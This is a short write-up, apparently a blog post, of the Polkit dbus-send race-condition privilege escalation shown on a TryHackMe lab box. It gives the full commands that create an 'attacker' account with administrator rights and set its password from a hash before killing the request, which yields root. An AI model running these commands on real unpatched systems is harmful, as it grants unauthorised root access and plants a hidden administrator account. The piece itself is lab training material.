Background
Polkit (AKA PolicyKit) is an essential component in Unix-like OSs for controlling system wide privileges. As you can imagine, exploiting this can lead to some nasty privilege escalation. There were a few mainstream OSs vulnerable to this (such as Ubuntu 20.04 and Red Hat Enterprise Linux 8), making this a very impactful exploit.
Understanding how and why this works
The original report can be found here.
Polkit is used to allocate privileges for users and processes. This exploit takes advantage of our ability to kill a dbus-send command the dbus daemon is able to pass Polkit the correct ID. In turn, Polkit errors and substitutes a 0 (all privs/root).
Demonstration
I'll be using the polkit box from TryHackMe to demonstrate this
We'll follow through the tutorial process. Our first command is:
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Pentester Account" int32:1
It's pretty long, let's dissect it. This command will be ran and monitored using "time". Remember we need time in order to check when we need to kill the dbus-send command. Our dbus-send command is going to request to create a user called attacker (and print the reply back to us). Typically we'll see this happen in a GUI and we'd then be prompted to give a password.
That takes us to our next command:
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$TRiYeJLXw8mLuoxS$UKtnjBa837v4gk8RsQL2qrxj.0P8c9kteeTnN.B3KeeeiWVIjyH17j6sLzmcSHn5HTZLGaaUDMC4MXCjIupp8.' string:'Ask the pentester' & sleep 0.005s; kill $!'
To continue making our new account, we need to provide a password. This takes a Sha512Crypt hash as input and uses that for the password. In plain text, the password is "Expl01ted".
Finally, we'll use the delay that we previously found to kill the command before the dbus-daemon is able to give Polkit our ID.
We're given a new account called attacker with the password of Expl01ted that's automatically added as a sudoer. We can su into this account and then sudo su to root.
How does this look in practice?
Honestly? It looks simpler than you'd expect. Other than the timing of the command, this is a low complexity attack since there's copy and paste dbus commands that we can use for this. Though even without those, some understanding of using dbus utils will let you exploit this.
Top comments (0)